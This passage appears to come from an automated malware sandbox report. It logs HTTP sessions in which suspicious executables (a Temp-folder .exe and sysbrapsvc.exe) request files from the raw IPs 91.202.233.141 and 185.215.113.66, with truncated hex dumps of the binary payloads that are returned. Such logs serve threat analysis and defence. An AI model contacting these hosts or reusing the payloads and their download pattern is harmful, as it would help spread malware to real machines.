                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:25:02.743066072 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:25:02.743144035 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:25:02.743210077 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:25:02.743585110 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:25:02.743599892 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:25:02.743649960 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:25:02.743999004 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              42192.168.2.84977791.202.233.141802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:06.240839005 CEST167OUTGET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:06.586477041 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:06 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:25:08.607018948 CEST167OUTGET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:08.952675104 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:08 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:25:10.982568979 CEST167OUTGET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:25:11.329552889 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:11 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              43192.168.2.849784185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:25.901874065 CEST166OUTGET /1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:26.244594097 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:26 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 101120
                                                                              Last-Modified: Mon, 06 May 2024 15:20:46 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6638f54e-18b00"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 2f eb 3b ff 22 8c 9e 7e d6 fa 86 16 25 d6 a1 eb 91 96 d2 6e ab 38 67 1c 3d 47 67 87 68 ce 24 2a dd 8d 07 7d 5e 1e 53 cf 7f 9f bc 53 5d 8e 04 f4 f9 09 4a 15 22 50 da b8 68 9f b3 a6 2d c0 84 94 bb 51 1c 79 b8 aa a0 30 32 32 47 8d 6d c6 9a 54 e9 66 08 fd 3c 2e b3 c9 6e 64 08 31 1f 3f ff cb e3 5e 8e 52 06 1f cf 42 06 a5 8d 78 fa ea fd 6c 47 55 3f a1 8a 36 0c 86 c2 37 a5 0d 96 df 47 6a f5 fa 9a ed d8 93 3c 00 a3 68 3d ee 32 c5 ce 5c c0 ae a1 7a ce 06 9b c4 2e 52 b9 87 a6 d5 8b 39 3e 60 52 51 20 df b6 cc b3 c5 97 33 24 0a 47 ff 73 ac cb 3b c1 25 f9 65 a7 9c 1b 55 78 a9 8a 26 c3 ad f0 c1 e2 6f 5b 1e 78 02 51 ed a0 19 31 a4 eb 64 ee 81 19 3b bb 92 5d 6f 1c dc 69 3e 42 33 60 0f 00 c2 e7 19 a3 9d d8 cd 2d d6 f7 1a 97 fa b6 df d6 69 04 54 0b aa 9f 3e 4d 56 2f 90 eb e5 dc 5f 4d 79 f6 da af 61 e3 70 78 76 42 ab 75 81 3d 29 65 73 41 39 c5 1e 6c 94 fd 3d 7c 17 bc fa 05 70 cd 19 c0 34 4e 24 68 bb ab d4 7f 18 4f 60 99 c0 3b 20 b9 ee e7 94 7e 1a 1a fd 3b e8 a4 77 5f e0 81 37 62 a8 66 c5 b8 b7 c9 32 ef ce 1c 9b 4a e9 [TRUNCATED]
                                                                              Data Ascii: /;"~%n8g=Ggh$*}^SS]J"Ph-Qy022GmTf<.nd1?^RBxlGU?67Gj<h=2\z.R9>`RQ 3$Gs;%eUx&o[xQ1d;]oi>B3`-iT>MV/_MyapxvBu=)esA9l=|p4N$hO`; ~;w_7bf2J6%9K2!PeeQfYwIf5*9Bs:L7-lgw/nlOsk,c$Mt7=PGKN6EDy!Ig6Yt7exU]5{Yl+5ZN'"'zZ}K2~:/U~1\M^lx1M8/50>f{VG%w uVTo=?ZUc~tMto|;q{x]+^(qpmKA<qvv9'b.T/Gp_e,7os?g&|d(v[d}|Xa1jv&B7j\o|N!i/u.,o#/v]1&o3T}l{fKV_E-&!1~uZ0}_+_i|sV!B[@L;;le;fGr<i7DLP`}8y#WqO)h/E^r7QuJ0 [TRUNCATED]
                                                                              May 8, 2024 15:25:26.244623899 CEST1289INData Raw: a0 2d e3 56 4f b5 70 35 f0 87 6d 9a a1 c6 80 d4 8f 8d da 29 da 12 7f 44 65 55 c5 e5 ad 6b 7f 92 1c 16 4c 62 59 24 20 27 a1 4e a6 58 37 f1 d4 4e 3a b8 07 27 be fe 79 d2 0a 4d a3 e9 b3 d3 27 ea 71 3e 45 12 d6 e4 a1 f1 c5 ca 1e dc 0b 6b c4 4d 1d bf
                                                                              Data Ascii: -VOp5m)DeUkLbY$ 'NX7N:'yM'q>EkM2YN JemGZ%>:P@OXW9E:>;n;EK_ptl[}?/EBR -zw{k@/ETJ4CSoD7K)N&)LPl8i:^.;?D
                                                                              May 8, 2024 15:25:26.244657040 CEST1289INData Raw: 34 95 48 63 4a 56 69 1b b6 d0 11 8b 43 3d f9 9b c1 7e ce 35 63 32 b1 a5 bd a2 ce 1d 8c 3c cd 5a 8c 04 19 20 36 cc 80 30 f7 36 0b bb 1c 5d aa ca 75 b1 fb f0 12 10 c5 8d b1 6b da 5c 25 f5 99 66 3a 04 1d 9f 21 83 7b 3f 47 a0 62 23 9e 6d 75 fc 06 13
                                                                              Data Ascii: 4HcJViC=~5c2<Z 606]uk\%f:!{?Gb#mue/bE)Ac,1_zXGl}J ,AoXu=/Tx;sGP'ZECi\ogb)]>JpA7NdI&"=%}w7a
                                                                              May 8, 2024 15:25:26.244734049 CEST1289INData Raw: 22 ee 51 86 c3 82 42 12 1e 23 94 22 31 32 98 d8 93 42 06 bc 3e ab 5a 7e 1b b2 9c 93 cf ed de db 56 ff d1 9a e8 c0 a3 e2 8c 16 0b 5d 25 0a f3 39 83 b8 8e d5 dc dd 2b 93 5a e8 e1 72 b6 41 ca d0 a8 ce 28 87 51 da 7d bc 57 1f 72 5e d5 40 0c 79 f6 6c
                                                                              Data Ascii: "QB#"12B>Z~V]%9+ZrA(Q}Wr^@yl4~n~uqy7Bk0k32[XOjxLve.BivxU8Qj-S,& fV?X#4J#< ^e\':l}btB
                                                                              May 8, 2024 15:25:26.244806051 CEST1289INData Raw: 14 17 af 0e 52 15 bc 73 cd 28 6c 9d fe 63 14 1c 81 15 ba ea f5 f5 b7 18 2c 57 40 8e 55 0c 7a 93 9e 99 9a 75 58 fb 01 95 7d 90 03 43 86 04 d7 af c7 1e 33 a6 17 c0 a6 8c 9d 26 ea af 5b e0 69 e8 2c 10 54 6a b6 4d be 13 63 30 f7 27 ee 68 6a 25 06 d1
                                                                              Data Ascii: Rs(lc,W@UzuX}C3&[i,TjMc0'hj%M>V*w=dfcwo$/n7.^Kfy37Iz[VZLF|%|s79\"%pNl\Rk-</'HQB14.k-!B>1lZ0_
                                                                              May 8, 2024 15:25:26.244923115 CEST1289INData Raw: 35 03 c6 69 a0 71 ee 00 0e a5 c7 7d 33 36 84 19 87 ec 1d 2d 6e 04 a5 fc 51 32 b5 18 97 f4 6e b2 82 9a bc 7e 2e b5 ce 63 92 99 20 a2 65 9f af 42 2a c0 06 b2 b1 5f 51 05 f2 20 e9 91 74 c6 3b 6d f0 ef ad 0c 15 65 45 32 52 e2 3e b3 a4 99 bd da e9 96
                                                                              Data Ascii: 5iq}36-nQ2n~.c eB*_Q t;meE2R>*pLyFU+:&1:PQB\?rumgqeP</;IzfMY;H,bmj{dVT2}-^ZY4]/eVI#/ z?_hX*w
                                                                              May 8, 2024 15:25:26.245007992 CEST1289INData Raw: d8 48 56 8b 5a b8 ab 63 32 07 0b 67 c9 9d d3 d0 75 09 e8 eb e5 85 2b b1 4b 64 12 fb 9c e5 a1 9e 3e 41 f0 08 2b 61 3b be 1e ef f1 0f 7b ff 90 28 db 02 fd 0f f0 e6 ec 08 87 94 5a 41 43 69 77 86 7b 79 28 5c 46 19 4a c0 d4 50 6f 9b 01 a5 ae 12 8d b2
                                                                              Data Ascii: HVZc2gu+Kd>A+a;{(ZACiw{y(\FJPoc,}-$g.j<+aoeO2(SL=[9HB8[s]YA1A/:FE0xJxUX>IWDWa5PH4(ho%q$qp
                                                                              May 8, 2024 15:25:26.245023012 CEST1289INData Raw: 09 b8 2f 79 14 9d ef 6d 09 77 e2 b2 60 84 e0 9b 45 3b 28 02 15 15 9d ee 50 b6 f6 a2 b9 1c 76 7f f6 8e c3 38 89 c2 df 40 2c 53 36 cd b3 d6 ff 35 7b 9a 79 01 e8 17 61 73 47 03 e2 a4 42 20 5c d3 65 07 0a a3 2b f7 e1 65 81 c9 7e 21 47 71 a8 a8 b3 a3
                                                                              Data Ascii: /ymw`E;(Pv8@,S65{yasGB \e+e~!GqKw;)+UXd4lseiezy}(<vaSf>_$eRiZ(,MyrL?BtwUYPwTV/cPUfJcrd
                                                                              May 8, 2024 15:25:26.245037079 CEST1289INData Raw: 38 90 ee eb 04 9b f4 3f 3f 31 b6 f4 34 59 eb 6f 0d 53 13 67 d4 a1 dd c3 95 f8 9d 11 aa 8d 8a b2 7f b6 e2 78 a8 ff 57 39 a8 95 52 70 35 c8 b2 cf 61 5e 07 6e c8 61 4d 84 b3 92 7e 9e 09 75 d9 93 53 13 9b ee 06 d3 75 48 e5 df e6 d0 96 53 bb de 81 4a
                                                                              Data Ascii: 8??14YoSgxW9Rp5a^naM~uSuHSJD>K4!o=zxNE:Mpy?WoQ!vP8K(9G(q>.(#7W}UQ.f~MaQz\ztY7Z0}R]O$\"TjEqjZ_
                                                                              May 8, 2024 15:25:26.245050907 CEST1289INData Raw: 3e b9 6e 66 f4 fb b3 e5 57 91 84 03 4d 3c 75 8e d7 b8 2f 54 26 be a9 d1 85 0b 7e d0 0a 77 d7 05 f5 56 ae ed ef 4e de 31 b6 25 1c e8 ca be e4 f9 b8 c4 c6 5f d6 09 b9 e9 43 fa 6f 7e 6e 7e b7 96 64 d5 3c 37 b6 f3 c8 ac fe 60 12 77 27 ea 10 ec 4a 1f
                                                                              Data Ascii: >nfWM<u/T&~wVN1%_Co~n~d<7`w'JCyKx-WO)fZ<eSz1WZoE2}-S:O:yQzt{Dx/Y0_eP#81n]FaBZx4hY4PE~Z#/kdXf
                                                                              May 8, 2024 15:25:26.584974051 CEST1289INData Raw: 8b b3 71 d9 c8 da 74 f5 6d 13 ab 82 5f 0f d7 2a 75 8b dd 33 63 1c b2 7d 94 1e 26 53 ac e2 1f 13 96 62 30 be f6 91 83 88 02 53 ab 64 26 46 78 9c 5f 55 53 4e e7 85 20 bf 19 62 c8 f4 73 7a 7b f7 95 a5 e0 a7 b3 5f af 93 4b f8 e5 09 51 e9 cb 5b 41 72
                                                                              Data Ascii: qtm_*u3c}&Sb0Sd&Fx_USN bsz{_KQ[Ary#<Fc)aH|!9**kjj?1~_Lc_>c\{LY#w^1d1?2jl&.ln)(An%e{Bj<q=+nG)=W


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              44192.168.2.849786185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:28.607213974 CEST166OUTGET /2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:28.948611975 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:28 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 15104
                                                                              Last-Modified: Wed, 24 Apr 2024 23:21:57 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "66299415-3b00"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4b e8 23 1d 0c 94 79 42 1c 1c 48 97 49 7a 96 f6 a9 d0 37 98 4e 18 a4 bf cd f5 ce 8d 00 4d 6c f6 9f 43 ea c4 50 f3 99 cb 6f 7f 29 ac 33 c1 1e 12 8e 34 8d 95 a7 ea 7c 62 91 62 10 61 f3 ab d4 6a b1 0a 3d 8c 22 70 e0 78 c2 05 ad 0c 8b 93 0b 61 d5 48 27 b5 a2 b1 76 88 94 ff 6e a7 e9 f4 c7 c3 48 3f d7 cf bd f1 a2 8e e1 3f ec 46 4f c8 b8 9d ea b3 ae d7 87 06 73 47 a9 ac 62 e9 fd b0 18 6e 84 ec 0c cc 82 c3 0f 82 5b 02 ec 9d e4 64 88 4f 2c 46 10 a4 dd 63 b7 a7 cf 5a b0 db fe 14 f8 fc 55 50 cc 7c 1d 98 b3 60 c0 ab 71 f8 25 3c 61 53 64 a0 d3 ce 2f 05 a7 f8 76 5a 2c 96 b3 67 78 59 67 17 11 7c b1 fe e0 a8 92 e8 4c 1f 74 26 fa 7b a2 02 92 bd ec 3d 08 ec f4 72 ef a3 d5 25 9e 4d 8d f4 d4 47 a5 08 6f c7 c5 f9 ab c6 e4 bc 48 81 e4 5d 23 c3 79 7c 8c fc ca 58 d2 4c 8c 18 bd e7 fe 22 4a b2 30 ad 4c 30 bd 90 e0 18 d2 77 c0 4a b1 c5 9d 03 c5 97 f3 e7 2d 46 d9 ae 13 86 5f 69 ce 8e 09 a4 95 a5 45 bb 82 e4 74 81 eb d2 3a a2 a1 37 25 c3 bc bd 85 b2 3c 84 47 5f 0e a3 fc ac d5 4b 82 de 1e ec fd 0e df 86 a8 6e 37 43 21 0d cf 8d [TRUNCATED]
                                                                              Data Ascii: K#yBHIz7NMlCPo)34|bbaj="pxaH'vnH??FOsGbn[dO,FcZUP|`q%<aSd/vZ,gxYg|Lt&{=r%MGoH]#y|XL"J0L0wJ-F_iEt:7%<G_Kn7C!XY={GRsw!0l0[!^irP:X$B(<:&axtQL[y<1:8cJi{Cw)Vx&`[gFkW?*(5pnH$~vL%i_oZ4S*~R6.0i[y ?JD!sn9a:z^Ee'4G~*ULV*<`9o8X'.63dd4kiZY!IvK<iH6HmMU>}L&0d{R!A7RZi(";b%Y.0#J2@Bs:g@h{^G<[Y/x6s*eZ8etZ=N.O`-,STepH7[:wf4kE5)Mm{:<tW;?U`y.E*0nk(D}=OLX9i,,a~pYZA/ qD_T.> [TRUNCATED]
                                                                              May 8, 2024 15:25:28.948753119 CEST1289INData Raw: b9 ec 48 5b bc 5c c5 cc 74 49 24 c8 79 28 87 7d 84 00 80 4b 76 48 a4 b5 c0 ff 47 f3 67 e3 7b 80 0f 8a 5f 14 81 b8 50 87 65 ef 85 cb 83 a1 8e f8 3c 60 82 4a 42 41 ed f5 9c d7 f1 6d 7a f0 c4 f6 40 ab 1b b9 0b a9 9f 8f 86 18 c8 d5 0d da 24 be 61 cd
                                                                              Data Ascii: H[\tI$y(}KvHGg{_Pe<`JBAmz@$a3/rB"SGAiD5#kK3"ZKD*6O(!nYA@2o<~&$PeX9As_q|0GRl'fB3CxjHgxQ|
                                                                              May 8, 2024 15:25:28.948767900 CEST1289INData Raw: 45 42 8e 2f e3 a5 18 82 da 03 3a a4 b5 2d a1 cc 37 03 69 95 7d 8f 7b 54 01 71 8e c4 3c 1f 9c 2b ad 07 75 d3 bc 03 00 7d 31 8d c5 42 72 2d 6e 86 18 0e 56 a1 80 c2 b6 5e de 4b 38 06 74 de 9d 2e 9f 49 8a 79 ba 55 46 49 9b d6 40 be 1d a1 f4 bd 0f 33
                                                                              Data Ascii: EB/:-7i}{Tq<+u}1Br-nV^K8t.IyUFI@39^+8"B;cr+=T]*:~uf+]tg]}>F.ez_4:6Mt9Lm`9xtIqMf@&/|F"PM__SEy`f'`.,c#%
                                                                              May 8, 2024 15:25:28.948884010 CEST1289INData Raw: da 8a 40 49 4a f5 3a 1a df 96 c3 5f 0b 5a fc fe 03 4c f2 79 5f f5 de 80 39 49 a1 18 82 83 a3 40 51 3b 3c fe 6c 6c 94 0c b1 5b bc 8b ed d1 7c 5e c4 2e 4e 83 35 ee 93 1e 6d f3 28 c0 26 4d 8e 20 52 43 de 37 80 2d 91 55 16 b0 af ab 19 02 2f 81 e9 0b
                                                                              Data Ascii: @IJ:_ZLy_9I@Q;<ll[|^.N5m(&M RC7-U/VgtXt@*<d5Y*K9G_2T.DsTzyH9H<">e6G{R9NzGGtjLT?+&5Ovx[~UY2&Q'de+RB
                                                                              May 8, 2024 15:25:28.948956013 CEST1289INData Raw: 01 e6 18 ad 0b 22 41 6b 9e 7f 93 1a ff da a3 28 22 08 4f 91 02 a2 0e 21 66 5b a8 47 fe a7 74 30 ea 1c 20 8a e3 83 e5 7a 80 18 1d cc 7e 49 21 86 2a 3c 44 43 ea fd 59 98 ca e1 d0 8f b5 75 78 82 8a e2 00 e7 c3 4f c9 1d f5 00 9e 8f 84 bb b8 d7 09 78
